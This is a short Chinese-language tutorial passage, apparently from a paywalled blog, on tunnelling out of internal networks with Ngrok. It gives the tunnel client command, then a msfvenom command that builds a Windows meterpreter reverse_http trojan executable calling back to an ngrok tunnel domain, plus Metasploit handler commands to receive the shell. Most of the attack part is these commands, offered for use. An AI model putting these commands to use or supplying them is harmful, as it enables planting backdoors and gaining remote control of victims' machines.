1、内网穿透-Ngrok
支持的协议:tcp、http、https
支持的类型:正向代理、反向代理
1.1、服务端配置:
开通隧道-TCP协议-指向IP和端口-开通隧道-连接隧道
可以自行花点小钱去购买,也能用免费的,不过大部分免费的都不能用

(tcp协议隧道↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑)

(http协议隧道↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑)

1.2、客户端连接服务端:
./sunny clientid 151559380722 #控制端连接Ngrok的服务器 ./sunny clientid <此处的隧道ID为上所开通的>

1.3、客户端生成后门配置监听:
(注意根据你的协议不同。生成木马reverse_ 后面协议需要相应改变)
1.生成木马 msfvenom -p windows/meterpreter/reverse_http lhost=yeye.gz2vip.91tunnel.com lport=80 -f exe -o httpNgo.exe #如果是tcp用他给你的端口。http协议默认80端口即可 2.开启监听 use exploit/multi/handler set payload windows/meterpreter/reverse_http set lhost 0.0.0.0 set lport 8888 #注意此处端口填的在开启隧道时所提供

本文介绍了四种内网穿透工具的使用方法,包括Ngrok的TCP和HTTP隧道配置,Frp的自建服务和客户端配置,Nps的服务端安装与客户端连接,以及Spp的特殊协议穿透能力。这些工具主要用于在内网环境下实现外网访问,支持多种协议和代理类型,满足不同场景的需求。
最低0.47元/天 解锁文章

1824

被折叠的 条评论
为什么被折叠?



